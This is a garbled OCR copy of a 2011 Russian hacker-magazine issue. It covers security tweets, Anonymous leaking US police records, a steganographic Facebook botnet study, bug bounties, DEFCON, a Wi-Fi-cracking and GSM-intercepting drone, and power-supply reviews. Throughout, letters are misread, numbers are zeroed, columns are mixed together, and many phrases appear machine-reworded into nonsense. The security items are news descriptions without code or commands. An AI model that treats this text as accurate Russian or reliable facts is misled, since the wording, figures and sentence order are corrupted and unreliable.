живает удивления . А про любопытных ссы­

болт остовериться, что-нибудь вам особа .

лочка, в духе сие было,- Ьit . ly/gjJzZD .

Введ ите ваше р еальное имя,

Гclpentestit:

комната телефона , а в свой черед боец социаль н о­

С п исок SSL-сканеров интересах пен­

го страхования другими словами стриптиз паспорта , впоследствии

тестеров! http : UЬit . lv!oBjSгT.

а нажмите кнопку " Я персона "» .

Гcltodb:
Различие посреди известными
х акерами равным образом настоящими зна­
ме н итостями на том, сколько зна­

ГciOxcharlle:

менитости на ооб ще-то знают, равно как пусть бы бы

Читаю доклады.

представляться вежливыми.

01

Комментарий:
Иногда во тв итах б ы вает име н так то, что такое?

твоя милость ищешь! П отому правда нны й твит равным образом п об п ал сюда.

Р ецензирование - сложная
штука! Я могу принять как только

ГclstrOke:

05% тем. Моя вопрос -сделать RSA «те х ­
нической» на зтом году, хотя ...

packetstormsecurity.com +
explo1t-db.~om + FD + Dai ly
Гclxme:

Dave + metasp loit "s change log

0!1!1

Комментарий: Г ражданин Чарли

Ставлю материальный сервер ...

-

Миллер жалуется получи и распишись темы докл адский

Какая скука! Вива виртуали-

-тяжело свершить круче.

про одной изо самы х уважаемых конфе­

0!1!1

Комментарий:

ренций годы -

-

Милворма издревле медянка нет, равным образом е го созда­

RSA. Организаторы выбра­

тель (0str0kel дав н об забил получай таковой пр оект.

ли Чарли, чтоб приглядеть технические

Гclkevlnmltnlck:

реферат ы да изготовить конфу « живее>>.

А ресурсов со вместе с пл ойтами, равно как во сегда, мно го .

Только почто приземлилея на Лас­
Вегасе!!!

Гclnlckdepetrlllo:

0!1!1

Комментарий: А га, получи и распишись п оминаю, что-то

П в рассуждении ходу, раса забывает, сколько

-

на днях БлэкХат да Дефкон насчет ш ел,

очищать периалгия ш ая разок н ица в обществе

где, кстати, было РЕКОРДН О Е сумма

TelePгesence [ . ..] на кл ючает

«вз л омать >> шифро во ание равно

нате ш их ребят! И Митник - тама же.

учетную из-за п ись root [и n а роль] ,

Опять фей из батман л м! «Сервер

Cisco

« давать >> его .

VU?EN

ГciVUPEN:

JЯ из-за платил

Java 0 те п ерь доступн а. Все моду­
ли имеют поддержку ASLR, а зна­
чит, огибать ASLR из через Java

диагностика бери п роникновение , равно во се , ч т по части

ROP ранее отнюдь не выйдет. Поздравляю O гacle/Sun!

XAICII8 00/153/2011

00 тыс. баксов ради

моя персона получил , - сие вслед за n уск сканера

Вау!

010 Ed i toг тепе рь убирать да для того
05 Х. Довольно живо ми

Nessus сертифицированным п по части CISSP товари­

Мае

щем . http://t . co/PehгnZn .

вооб ще безвыгодный нужна довольно винда!

nt

MEGANEWS

НЕДАВНО В КИТАЕЗАКРЫЛИ 02ЛИПОВЫХ МАГАЗИНААРРLЕ , которые на точности копировали официальные бути для да Apple Stoгe .

«АНОНИМУСЫ»

АУДИОСИСТЕМА
EDIFIER С5

ДОБРАЛИСЬДОПОЛИЦИИ

НАБОР КАЧЕСТВЕННОЙ 0.1 И 0.1+ АКУСТИКИ ДЛЯ
КОМПЬЮТЕРА
родук ц ия Edifieгyжe бог не обидел полет пользуется во России
зас л уженной п опулярностью, позтому мь1 безвыгодный
могли покрыть расстояние мимо новой модели- С5 . Новинка
представляетсобой мультимедийнЬiе колонки

0.1

равным образом

0.1 +

lc внешним уси л ителем!. Система осна щ ена 0-дюймовЬiм
сабвуфером да двухполоснЬiми сателлитами вместе с экра н иро­

ваннЬiми 0.5-д юймовЬiми динамиками равно 0/4-дюймовЬiми
ШеЛКОВЬIМИТВИТТерами.

Внешний мегафон может похвалиться встроеннЬiми

FМ-тюнером, USВ-разъемом да 00-кардридером . Вп олне
ожи д аемо, зачем строй умеет пр оигрЬi во ать МР3,

& РСМ

WMA

не без; разнообразнЬiх носителей- судоходство до список да

каталогам осуществляется со через пульта дистанцион­
ного у п равления.

Техниче не без; кие характеристики новинки:

ВЬiходная мощность:

RMS 0Wx 0 + 05Wx 0ITHD=10%I

Соотношение сигнал- ш ум: тмg5 д Б IAI
Искажение :
охоже, лихо довольно уймись сказать, кого сызнова НЕ ха для ­
нули Анонь1. Кампания

AntiSec набираетоборотЬI,

равным образом сегодня очередьдошла накануне п олиции С Ш А . Атака
бЬiла совершена сверху

07 веб-ресурсов,

большею частью получи

сайтЬI ш ерифских управлений во штатах Луизиана , Арканзас ,

Миссисипи равно Канзас. П по отношению неподтвержденнЬiм даннЬi м, по­
страдала и полицейская академия равно трест даннЬiх не без;
информацией в отношении заключеннЬiх . Как бЬI так ни бЬIЛО, во сумме

Входное сопротивление:

слил держи Pastebln

НизкочастотнЬIЙ динамик: В дюймов

способности насчёт членах

nолиции BART IBay
Агеа Rapid Tгansitl .
Информация об име­
нах, адресах да счетах

000 поли­
цейских оказались
паче нежели

во открытом доступе .

Однако, возможно, ко

хакерам фаллос алосьзаполучить паче 0О гигабайттрофейнЬIХ

этoмyAnonymous"ы

д аннЬiх , посредь коток орЬiх бЬiла различная данные касательно больше

неnричастны

нежели

0.5%

Тем временем черт знает кто

ваннЬIЙ,

0ОК Dhm

СреднечастотнЬIЙ громкоговоритель :
ваннЬiй,

0210 мм! , зкраниро­

0 Ом .
0.5 дюйма 092 мм!, зкраниро­

0 Ом.

ВЬi сокочастотнЬiйдинамик:

03 мм.

утнапиштим мембраной, зкранированнЬIЙ,
Сабвуфер:

из шелковой куполь­

0 Ом .

05 Вт.

0000 сотрудников правоохранительнЬiх органов. Утекло

все-логинЬI, жете роли, заезжий двор социального не без; тр ахова ни я,

даннЬiе банковских карт, адреса равно ажно электроннЬiе

письма.Разумеется , прятатьдобЬiчуотсетевойобществен­
ности хакерЬI далеко не стали равно ВЬiложили до этого времени д аннЬiе во открЬIТЬIЙ

д осту п . Д ополнительно репутацию п олиции п одпортил равно оный
факт, почто у многих сотрудников обнаружились ненадежнЬiе ,

простЬiе парали lобЬIЧНЬiе словарнЬiе слова, их имена или — или
подворье значков!. Кстати, <<Ано н имусЬI» заявляют, сколько слив
инфь1- отплата следовать н едавний повязка

04 человек,

обвиненнЬiх

во участии на атаках, совершеннЬiх во декабре равным образом нарушивших
деяте льно сть

PayPal . Словом,

<<Ано ним усище малограмотный прощает>> равно н е

ленится об этом напоминать.

ГРЯДЕТМОБИЛЬНАЯОСОТ

MOZILLA. На форуме на
разработчиков Mozilla
появилось оповещение что касается том,
зачем на стане компании кипит

разработка надо проектом Boot
to Gecko. Основываться ОС
довольно бери движке Gecko, кото­

рый используется равно на других

0 МЛН ПРЕДУПРЕЖДЕНИЙ

ТРИ САМЫХ ПЛОХО ЗАЩИ­

продуктах Mozilla: как например

выдает всякий день шарага

ЩЕННЫХ социальных сети,

на Fiгefox"e равно Thuпdeгbolt"e.

Google, предостерегая относительно вне­

пользующихся наибольшим

Акцент на Boot to Gecko хорэ

дрении вредоносного ПО пользу кого

« успехом» у мошенников , ­

сделан держи веб-приложения,

приблизительно 000 млн людей .

сие

написанныесприменением

Facebook, Twitteг равным образом
MySpace, сообщает компа­

HTML5.

нияSорhоs .

012

ХАКЕР

00 / 053/ 0011

MEGANEWS

ВЫХОД IPAD 0 ОТЛОЖЕН давно следующего года, сообщаетиздание DigiTimes.

FАСЕВООКНАГРАДИТХАКЕРОВ
КРУПНЕЙШАЯ НА ПЛАНЕТЕ СОЦСЕТЬ УЧРЕДИЛА
НАГРАДУЗАПОИСКУЯЗВИМОСТЕЙ

А ЕСЛИ
СТЕГАНОГРАФИЯ?
ИНТЕРЕСНОЕИССЛЕДОВАНИЕ

ОБ УХИЩРЕНИЯХ В БОТНЕТАХ
руппа программи стов изо Института информа­

ционны хтех нологий г. Индраnрастха !Индия! равно
Университета Иллинойса ICШAI в рассуждении п уб ликовала до
адресу aгxiv. o гg/abs/1107.2031 результаты любопытного
исследования, доказывающего , что-нибудь созда ни е стега н огра­

фического ботнета, передающего информацию чрез со ци ­
альные яма , этодовольно nерсnективная равно вслед за ни мательная

штука. На бы ведь ни был обстоятельство скажу, зачем сте ганография- сие
дисциплина об скрытой передаче информации порядком сохранения во
Сначала Facebook
организовал соб­
ственный хакерекий

тайне самогофакта передачи. Исследователи рассматри­
ваюттеоретическую программ у Stegobot, которая, попав

держи колтун nьютер пользователя !обычным путем- наnример,

конкурс, сегодня
поощряет хакеров

...

кликом согласно нехорошей ссылке!, ведетсебя безвыгодный ничуть обычно.

Так равным образом давно хакерекой
конференции
им . Марка под самым носом

Вместопередачиконфиденциальныхданныхнаnрямую,nо
старинке, Stegobot выжидает момент, если пожертвование начнет
погружать во Сеть какие -либ касательно изображения, да зашифровы­
ваетукраденные nарали равным образом заезжий двор банковских карт на графи­

ледуяnримерудругихкруnныхигроковрынка ,с оциальнаясеть

ческие файлы от nомощью стеганографии! К примеру, одна

Fа вместе с еЬооkрешилазаинтересоватьnотенциальныхловцовбаговрублем .

залитая на Facebook JРЕG-картинка вместе с разрешением 020х720

Точнее , долларом. Цукерберг равно комnания учредили сnециальную nро­

3 для селов !максимальный нате Facebook размер! вмещает до самого
00 Кб информации кроме видимых последствий с целью качества

грамму выnлат, nолучившую имя Secuгity Bug Bounty. В рамкахданной
nрограммы , люди, нашедшиеуязвимости да ба г да во сервисах со циальн ой сети,

изображения. Когда такие зараже нные картинки просмо­

nолучатзаэтоденьги.Сколько?Зависитотсерьезностидырки.Стандартная

тритпользовательдругогокомпьютера,инфицированного

лавры равно 000 долларам , при всем том руковод ство Fa cebook сулит равно паче

Stegobot"oм, сообщение п ереза пишется на его фото. А все же

кру nн ое воздаяние вслед серьезныеуязви мости. Точные средства nри этом

на книжка а Fa cebook"e пользу кого сего хватит только отворить насчет ­

неназываются,цен~таксказат~договорная.Основноетребованиекуязви­

обложка другого юзера, таково как бы во сацсети работает предвари­

мостям- мочь из их nомощью реформировать nереанальные способности nоль­

тельная нагрузка изображений .

зователей Facebook другими словами но сорвать настройки безоnасности системы. Как

Исследователи просчитали равным образом даже если смоделировали

nравило , сие касается ХSS-уязвимостей, на томик числе уязвимости CSRF/XSRF, равным образом

ра со пространение информации сквозь Stegobot возьми присутствие мере

внедрения nроизвольнога nрограммног а стих . Разумеется, nрограмма выплат отнюдь не

фота хости н га Flickг. Они эмулиравали вентерь с 0200 связан­

рас пр остраняет из автор этих строк нате уязвимости на сторонних приложениях, используемых alias

ных доброжелатель из другом аккаунтов, около этом воспроизведя частоту

исnользующих Facebook, а в свой черед получи уязвимости , вызывающие отрицание с обслу­

выкладывания фотографий . Спрятанные на изображения х

живания либо рассылку спама от применением социальной инженерии . Сообщив

документация nопали на рычаги хозяев гипотетического ботнета

в рассуждении найденной дырке, нелишне подать сотрудникам

архи быстро. То поглощать сие работает.

Facebook период чтобы исnравления

проблемы да никак не подстегиваться обнародовать найденные недостатки. Ну равно пока что для того nо­
лучения ден ег нужно затрачивать на стране, безвыгодный попадающ ей почти юрисдикцию США .

Кроме того, по сию пору сие дозволительно проэксплуатировать равно во обратном на­
пр авлении . Хозяева такого ботнетамогут бросить во интер­

Сравнения за н апомню, в чем дело? Mozilla теперь готова после раскошеливаться вслед уязвимос ть 0

отсутствует картинки вместе с после шифров анным на них исполняемым кодом, равным образом

твоя милость вместе с . уе ов, а Google-yжe 0133,7. << Кор nорация добра >> , с руки , поуже потра­

аспидски бойко сей адрес попадет для зараже нные компы, раздав

тила получай « оnлату ба го во >> паче 000 ОООдолларов . Чт о-то жа днич ают Ц укерберг равным образом

им соответствую щишки е << nриказы >> .

сотоварищи.

ФЛЕШКИ- НАСТОЯЩЕЕ ЗЛОДЛЯ КОРПОРАЦИЙ
Бот-мастер

Социальная

"Оо/о ОРГАНИЗАЦИЙ ИМЕЮТ

яруча

[facebook]

ВОБОРОТЕОКОЛО50000USВ­

УСТРОЙСТВ, 00о/о- ОКОЛО
000000УСТРОЙСТВ.ПОТЕРЯ

ФЛЕШКИ С ВАЖНЫМИ ДАН­
НЫМИ ЧРЕВАТА УЩЕРБОМ
ПОЧТИ В 0,5 МЛН ДОЛЛАРОВ!
ХАКЕР

00 / 053/2011

___. Украденные

___. Команды

___. Малварь

документация

013

MEGANEWS

РОССИЙСКАЯ КОМАНДАВПЕРВЫЕ ПОПАЛА В ФИНАЛ DEFCON CTF. Подробности в стр. 02

ПАТЕНТНЫЕ ВОЙНЫ

DEFCON 09

ПРОТИВОСТОЯНИЕ GOOGLE И APPLE/MICROSOFТ НАБИРАЕТ ОБОРОТЫ

КРУПНЕЙШАЯ В МИРЕХАК-КОНФЕРЕНЦИЯ
ПРОШЛА В ВЕГАСЕ
но традиционно результат августа ознаменовался nро­

шедшим вЛас-Вегасе

DEFCON . Если твоя милость далеко не знаешь,

что такое? сие такое, в таком случае журнал, инструмент жно быть, попал ко тебе

во грабки согласно ошибке. Конференция каждый год проводится на
Вегасе равным образом соби раеттысячи персона со лишь мира. Что забы ли
со временем по сию пору з ти сыны Земли ? Они nриезжают получай одно с крупнейших
хаке рски х собраний держи нашем королек е, идеже помимодокладов

из года в год nро ходят да самые знаменитые хакерекие lwh itehatl
соревнования Capture The Flag . Что примечатель но, во этом
году nрограмма конференции пополнилась курсами DefCon

Kids, рассчитанными для дет ей от8до 06л ет, которые хотят
узна ть, как бы от жулик нравственными взломщиками. Детишек
учи ли разверзать замки, «вз ламывать

Google>> равным образом использо­

вать шифрованн ое общение.
Н что касается п е р ей дем ко взрослым. Описыватьдоклады равно пре­
зентации безвыгодный не без; танем , для ним твоя милость можешь автономно при­

об щить ся соответственно адресу defcon.org. А вотсамое прикольнее собы­
тие конфы назовем. Многострадальный вклад что до н Барр , крутившийся

ге неральный руководитель HBGary, nри сут не без; твовал получи и распишись конферен­
цииnолутайн~таккакnолучилnисьменноеуведомлениеот
ы несомненно слышал по части фолиант , что-то на за отзвук ни е месяцы

адвокатов

вокр у г мобильных усик тройств получи и распишись платформе Android

почерпнуть судопроизводство ебный дозволение бери е го выст уп л е ние . В итоге Барр

да их производит е лей щуп лят нешуточные страсти.

ко Samsung"y да Barnes & NоЫе, иски Apple ко Н Т С" у равно Motorola

безвыгодный учас твовал во вслед за пл аниро ванн ой танцевальный шаг н е ли «W ho everf igh ts
monsters: confro nting Aa ron Ваг г, Anonymous and ourse lves»
равно дискуссию по части LulzSec "e, Anonymous"e, а равным образом об отношении

равным образом беспричинно дал ее. В со вя зи от сим во СМИ еще давнёхонько заговорили в рассуждении

американскихвоенныхккибервойнетолькослушал.

т

Стоитхотя бы перебрать в памяти судебные иски компании Microsoft

HBG ar y, во котором вместе ло сь, что такое? они намерены

для галерея суп х nатентны х войнах !такая тактика, во общем-то,
малограмотный н ова ! , все в настоящий момент да во Google с поднятым забралом будто в отношении томик а
самом. Главный пандектист Google ДэвидДраммонд во офици­
альном благе компании заявил, что-то Microsoft, Apple равным образом Oracle

организовали напересечку Android"a целую камnанию, целью
которойявляетсявзвинтитьценынаустройстваназтой
платформ е . Как твоя милость nонимаешь, основным оружием, которое

конкуренты да вместе с польз устроенность nротив Android "a, являются патен­
твоя милость . Суть сво дится для тому, с целью сорвать покров Google во нарушении
этихсамыхnатентовизаставитьпроизводителейустройств

возьми Android"e выnлачивать отчисления патентодержателя м.
В не без; в ем посте Драммондособо подчеркн ул , что-то Google

0000
патентов внове

приобрела шарага
Gооglеукомпании
IBM, причемдалеко
отнюдь не всё-таки изо нихсоот~

ветствуютпрофилю
компании. Просто на
наши век у кого

значительнее патентов, оный
равно то ли дело

нам ере получи следовать щищать платформ у Android. Д ействите льно ,

миг бы уже, тем малограмотный менее братия Apple еще д оби ла сь временного
коллегия еб ного запрета получай nродажи nланшета Samsung GalaxyTab

00.1 получи территории стран Ев росаюза !правда, е го ко моменту
публикации сделано сня ли! .

СЛУЧИЛОСЬ НЕВЕРОЯТНОЕ И
УДИВИТЕЛЬНОЕ --компания

Adobe, из какого рода Flash ранее сыздавна
стал неотъемлемой в известной степени
Сети, наконец-то поддержа­
ла альтернативное ПО пользу кого
создания веб-анимации вместе с
через открытых стан­

дартов, включительно

HTML5,

УСПЕШНОГО И ИЗВЕСТНОГО

ОФИЦИАЛЬНАЯ БИО­

CSSЗ равно JavaScript. Бета­

хакера-самоучку наняла возьми

ГРАФИЯ главы Apple Стива

разночтение программы

работу братия Samsuпg.

Джобса выйдет раньше,

Edge уж вышла на свет, рас­

Стив <<Суапоgеп» Кондик

нежели планировалось,-

пространяется бесплатно,

известный наравне созидатель про­

на ноябре

равно ее сейчас допускается использовать вместе с

шинки CyaпogenMod.

получит термин <<Steve

сайта

011.

Adobe Labs.

Adobe

0011

г. Книга

Jobs:A Biogгaphy».

ХАКЕР

00/153/2011

MEGANEWS

ПЕРВЫЙТРОЯНДЛЯ HOBOГOANDROID"A 0.3 ( G i ngeгMasteг) обнаружили во китайском Andгoid Maгketplace .

ХАКЕРСКИЙ БЕСПИЛОТНИК
КАК ПОСТРОИТЬАРОН И С ЕГО ПОМОЩЬЮ ВЗЛОМАТЬ ТО,
Ч ТОН ЕДОСТУПНОСЗЕМЛИ

н

а конференции

BlackHat исследователи

Майк Тз сси да Ричар д Перкинс

представили вторую версию беспилотного аппарата Wiгelessдeгial

Suгve i llaпce Platfoгm (беспроводной платформы воздушного наблюде­

ния) . Н а п омним, ч т насчёт их первоначальный д ран, относительно котором автор сих строк писали годочек наза д , был в силах облетывать
т ер риторию согласно заданному маршруту равным образом скликать информацию что до WiFi-ceтяx. За
основутогда была взята конверсив МиГ-23 , для которой добавили компьютер

РС

Via Epia Pico ITX
(500 М Гц Via С7, 0 Гб RAM из Backtгack 0 для борту) равно наладили систему автома­

тического пилотиро на ания Aгdu P i l ot. Система п одд ерживала связ ь со н аземной

базовой станцией во режиме реального времени при помощи РРР-оvе г -SSН­
тоннеля . Со второстепенный версий беспилотника Тэсси да Перкинс зашли в будущем . Взяв следовать
основу остатки военного беспилотного самолета, они построили конверсив весом

04 фунтов (6,35 ко г ] равным образом д линой на 0 фу-ты т ов (183 см ) . Е е оснастили Via Epia PX5000EG Pico
ITX РС (500 М Гц Via С7, 0 Гб RAM), а теперьуже подуправлением Linux BackTгack 0.
Также во комплекте следующий версии вошла nрограмма с целью брутфорса со словарем
на

040 млн

слов. Благодаря этомуWАSР стал станет малограмотный исключительно утилизировать от­

крытые хоте поты, так да исполнять ряддействий интересах взлома закрытых WiFi-ceтeй.
Дран связывается (: О станцией при помощи 0G-донгла, да та, во свою колонна ,
осуществляет обследование по-над моделью рядом nомощи

Google E aгth да открытого

ПО

с целью автопилота. Та но базовая трест собирает данные, полученные с драна ,

равно сквозь

VPN

nерена п равляет их для сервер, кто станется отдубасить паче

сложные сведения равно выполнить сильнее слож н ые вычисления. Беспилот н ик в свой черед
нате у чился коптеть во качестве мобильной GSМ-станции . Совершенно неза-

метно интересах абонента симпатия сnособен nринять получай себя GSМ -сое динение равным образом вместе с через

0G

модуля переправить его

no Vo iP. Таким образом, звонок отнюдь не оборвется равным образом его
SMS фиксируются нет слов встроенной памяти

способен на озможно записать. Раз г оворы равно
аnпарата, откуда масштаб равен

02 Г б.

Немаловажный факт-самолет работае т ото электрического двигателя, приблизительно
зачем прослышать его только почто не нельзя сейчас держи расстоянии примерно

05 м.

И даже если пра­

Н а n насчёт ст ро йку, тести рова ни е равно у сове р ше н со т вов а н да е эт ого апnара та у
n е р ки нса да Тэсси ушло

0300 ча со в. Ден не особа — змея ные вло ж ения разработчиков
0190 долларов

б ы л да н е та для на е л ики, во вкусе м в рассуждении жн в отношении nод смысл а ть: они соста вили

русалка Федерального авиационного агентства из-за п рещают полеты таких устройств

бери высоте паче

000 футов [122 м), дра н , построен н ый Тз сси равным образом Перкинсом , может
00 000 фут что до во [6096 м) .

расти в высоту сильнее

Применитыакой аnпарат дозволительно бог п о-разному: нет слов полезно да никак не бог . Так,
возлюбленный станется совершать по части п бретер ц ии

no nассивному прое л ушиванию

+--------

беспрово д ­

ных сетей равным образом их взлому, спуфингу сотовых вышек, топтать вслед за сотовыми телефо­
нами да перехватыватыелефонные разговоры, эксфилырироватьданные иначе говоря

nросто проводить видеонаблюдени е.
Официальный сайт проекта по-nрежнему получи и распишись ходится п в рассуждении адре су гabЬit-hole . oгg .

Там твоя милость най д ешь м н ожество позитив гр афий, видео, п резе н та ц ии вместе с

DEFCON 09, а вдобавок п одробный раздел атом,

Black Ha t 0011

равно

вроде собратьтакую но штуковину от вои­

0

ми руками . По словам П е ркинса , <<Чтоб ы сложить такую модель, никак не нужна научная
сте пень >>. Кроме того, весь комплектующие идетали дозволительно вольготно завестись на
ма г азине .

XSOUND OTWINSTON XS

клуба не без; модным дизайном равно интерактивным

Этим в летнее время

контентом, располагались chillout-зoнa, бар­

WinstonXS nредставил экс ко лю ­

зивную nлощадку XSoundBa г в леген­

ная сто йка из необычным кокте йльным карточка равным образом

дарном британском ореnа i г-фестива л е

инно во аци возлюбленный н ое простран ство 00-mappiпg, идеже

Winston Global Ga t heгing Fгeedom Music,
какой состоялся 06 июля 001 0 возраст nод
Санкт-Петербургом. Более 00 000 ч еловек

первый попавшийся был в состоянии постараться себя во роли

собрались получай данное мероприя т ие, в надежде

н а танцполы лучшихроссийских клубов. В новом

подслушать се т ы с лучш их диджеев решетка .

DVJ.

После остановки держи Winston Global Gatheгi п g
Fгeedom Music веч еринки XSound возвращаются

кл б

м.сноне ~оundпредставиткиловатты

ХSоundВагна ходилсявса м касательно м эnицентре

фестиваля. Внутри двухэтажного объекта, \

выполненного на эстетике настоящего ночно\о

арт да стов равно диджеев,за расписанием которых

не грех присматривать в сайте www.winstonxs. гu.

~ МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖдАЕТ:

W

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ

FERRUM

Алексий Горбу нов

...

П ТАИТЕСЬ
ПРАВИЛЬНО!
ТЕСТИРОВАНИЕБЛОКОВПИТАНИЯ
CTAHДAPTABOPLUSGOLO

Что нужнодля сборки продвинутого игрового компьютера? Качественная мате­
ринская цена , неустаревший процессор, сильнее п амя ти , видеокарта помощнее,
бойкий равным образом укладистый несгибаемый диск? Несомненно, целое сие надлежит оказываться упако ­
вано на благообразный равно мешковатый спорткорпус . Но животрепещуще никак не забывать, почто главне й ший ком­
понент будущей системы- сие узел питания. Именно симпатия бросьте наделять энергией
твоего игрового « монстра». Мощные конфигурации отличаются повышенными
требованиями ко питанию, особенно сие касается прожорливых видео карт, а равным образом

связок SLI да CгossFiгeX . Отсюда мораль : наступать ко выбору БП необходимо вместе с умом.

МЕТОДИКАТЕСТИРОВАНИЯ

н аблюд аем реальныезначе н ия н ап р яжений п оли­

В се ис пы туемые б л оки п равным образом тания пр ош л да дерево т ы сверху

ниям , которыеиза п исываем . Зат ему на е л ичи во аем

от те нд е D-R AM DB S-22 00 через колтун п а ни равным образом FS P. Ко н ­

п что касается тр ебл яемую мо щ нюхалка т ь н а л иниях + 02V д по части 000 Вт равно

со тр ук тивн оо н помогите т по части ити з для в рассуждении л касательно д окср а з ъ емам и,

п насчёт вто р яем п ро цессза н ово .Пр е д е л а ми что касается г р а н ич е­

слабо п од ко л ю ч аются для а бе ли что до т БП , н агрузоч н в отношении г по отношению

ни йяв л яютсязначениямакс равным образом ма льн ойкомбиниро­

б л ока, ох л целых д аемо го пр равно п омощ равным образом вент шлам ято р ов,

во а нн ой н агрузкиукаж перед гоизб л оков п ита н ия.

п ерек л ючате л ей дл аз многогрешный вас не без; т а вл е н иясилытокапо

Резул ьтаты ис п ытаний -это пр что до ц ентные по отношению т кло ­

Cooler Masteг Silent Рго Gold 000W
Corsair Professional Seгies Gold АХ750
ENERMAX MODU87+ BOOW

ос н по отношению вны м лини ваш покорный слуга м да п а н е л да да нд икации н а п ряже­

н ения для п ряжения п по отношению каждой иэ осно во ных л да н ий:

FSP AURUM GOLD 000

н ия . Пр равно п омо щ равным образом д а нн по части го сте нд а мож н относительно н агрузить

+З,ЗV, +5V, +12V. Ч ем ме н ьше однова н ица меж ду

FSP AURUM GOLD 000

б л ок волокно н ия мо щ ност ь ю д в отношении 050 Вт.

заме р ен н ым равным образом идеальным значе н иями н апряже­

Тесты пр овод равным образом л ись п осле дую щей схеме .

ния, тем кризис миновал : значит, группировка 14 тания эффек т ивно

П е р ек л ючателямиустанав л иваем д ля линий+ 02V

рас п ределя е< нагрузку да н е пр оседает. Также оце­

п с ребляемую мо щн стандарт ь, ра вную 000 В т. Д алее

ни во ались:комплектпоста во ки,оснащениетеми

позже д в отношении во ате л ь н в отношении п ов ыш аем н агрузку получи л да н равно ваш покорный слуга х

или — или иными разъемами пользу кого п относительно д ключения, высота

+ З , ЗV да +5V из ш а гом 00 Вт. Н а п а н е л равно равно нд ика ц ии

ш умаинаг р евкорпусабл окапи т а н ия .

016

Thermaltake Toughpower Grand 050W

ХАКЕР

00/153/2011

Пит айтес ь пр ави льн касательно !

COOLER MASTERSILENT
PROGOLD700W
ачинаем не без; блока nитания Silent Рго Gold 000Wот комnании
Сооlег Masteг. Принадлежность ко золотому сертификату

00 PLUS. Блок nитания модульный равным образом оснащен встроенным
хвостом изо nр аводав из разъемами 00+4-nин пользу кого материнской nлаты,
0+4-nиндляnроцессораи6-nиндлявидеокарты . Комnлектпоставки

включаетвсе прочие кабели на nитания комnонентов системы,
уnакованные во исполнительный чехол, до некоторой степени стяжек-лиnучекдля nро­
зажор в, креnежные винты, инструкцию да декоративную наклейку.

Мощность Silent Рго Gold 000W составляет 000 Вт, высказанный макси-

мальный площадка по мнению линии+ 02V может доходить 06 А 0672 Вт]. Охлаждается

01>

секция nитания nри nомощи

020 мм вентилятора не без; автоматическим уnрав ­
лением. П относительно результатам исnытаний Silent Рго Gold 000W nр одемонстри­
ровал nолную неизменность закачаешься всех режимах нагрузки.
Максимальные отклонения nоказателей в области контуры +З,ЗV достигли
только что

0%, а по части каналам +12Vи +5Vуложились на 0%. Все время, nока шли

тесты,шумотвентилятораблокаnитанияоставалсяумеренным,даже

низким. Сам БП н а ~щуnь был чутьтеnлы м, равным образом н е сильнее того.

CORSAIR PROFESSIONAL
SERIESGOLDAX750
гofessional Seгies Gold АХ750 сколько-нибудь выбивается изо нашей
nафосной комnании своим строгим, аскетичным видом. Этот
установка nитания интересен nрежде всего делов тем, что такое? возлюбленный nолностью

модульный: nравадов изо него безвыгодный получается заключая никаких , всего только разъ­

емы. АХ750 ну ась? ж на комnлекте из набором кабелей l заботливоукутанных
во сорока бери лиnучке], инструкцией, винтиками равным образом стяжками к nроводов.
Часть кабелей ISATA равным образом Molex] сделана nлоскими, как бы да у nр е дыдущего
БП отСооlег Masteг. В nроцессе nодключения кабелей я столкнулись
из nроблемой-nолное за глазами каких-либо nодnисей ко разъемам
возьми корnусе БП тож ежели и бы цветового их разделения. АХ750 сnособен

выработать 050 Вт мо щн ости итеоретич ески обесnечить водобег на 02 А 0744 Вт]
nолинии +12V. С охлаждением на этом месте сnравляется 020 мм вентилятор.
Результаты тестовАХ750 говорятсами вслед себя-nоказатели отличные.
Отклонения во nределах 0 % объединение по всем статьям линиям.
Вентилятор АХ750 неграмотный вращается, nока заваливание БП составляет

дешевле 00% , nри н агрузке ото 00 давно 00 % симпатия работает во тихом режиме
равным образом токмо ближе ко 000 % начинает раскручиваться, хотя восчувствовать его
nроблематично .

ВЕНТИЛЯТОР ВОО&ЩЕ НЕ
ВРАЩАЕТСЯ, ПОКАЗАГРУЗКА &П

СОСТАВЛЯЕТ МЕНЬШЕ 00°/о
ХАКЕР

00 / 053/2011

017

FERRUM

ENERMAXMODU87+800W
ODU87+ 000W-один с лучших блоков nитания ENERMAX.

Корпус

выnолнен с шероховатого металла да оборудован вентилятором вместе с <<з олотыми>> лоnастями . Модель, ра зумеется, модульная.

Комnлектация объемная: правила , кабе ли равным образом визитка для ним, креnеж ны е
винты , хомуты сверху лиnучке, стикер, а и интересная штукенция nод названием

CoгdGuaгd, которая закре nляет ся с воли блока nитания равно защелкивается
нате сетевом шнуре, удовлетворительно ержи вая его через выnадения изо разъема БП. У

MODU87+
0 виртуальныхлинии +12V, до ЗОА держи каждую, nри этом
суммарная дополнение объединение ним заявлена во 092 Вт. Перейдем ко тестам . Здесь всё-таки
замечательно: отклонения на 0-2%, равно н е паче того . Отдельно обра тим не заговаривать зубы для nоказатели силуэт +1 0V, которые печаль шую дробь времени остаются

000W во

наличии

01>

равным образом совершенно идеальными. При оценкеуровня шума до невозможности nоло жи т ель-

ны е вnечатления остались через

040 мм вентилятора, какой-никакой работаеттихо

да эффектив но. Отметим, аюшки? nосле выключения сис т емы фен единаче

какое-то промежуток времени работает, ограждая комnоненты БП с р езко го переnада
темnератур .

FSPAURUM GOLD600
локnитанияуnакованвчернуюсзолотомкоробк~самон
оформлен на томище но цветовом стиле. Комnлект nоставки состоит
да з: инструкции , сетевого шнура , стяжекдля nроводов, креnеж­

ных винтов ну да нате клейки

FSP. Примечательны скромные размер БП:
050 мм равно несложно nомещается во вместе с тан­
дартном корnусе, никому безвыгодный мешая . Мощность FSPAURUM GOLD 000,
в качестве кого как мы погляжу с нате звания, равна 000 Вт, возвещенный КП Ддо стигает 00%,
ась? соот во етст на уетсертификату ВО PLUS Gold. Каждая изо 0 виртуальных
во длину возлюбленный достигает всеголишь

<111

линий~2Vобесnечиваеттокдо18А .
По ре зультатам тестов содружество nитания n оказал себя нате достойном
уров никак не . С одной стороны, отклонения до лини ям у него больше явные, не­
жели у остальных исnытуемых, особенно п по отношению каналу+5V, гд е они доходят
накануне 0%. С прочий -все значения укла дываются на доnустимые рамки.
Чего, nравда, н е скажешь абуровне ш ума. При интрузия утнапиштим загрузке гук
вентилятора внятно слышен. Затоте nл овые nоказатели на норме,
nерегрева н е наблюдалось .

Cooler Master
Silent Рго Gold
000W

ТЕХНИЧЕСКИЕ
ХАРАКТЕРИСТИКИ

ENERMAX

CorsairProfessional
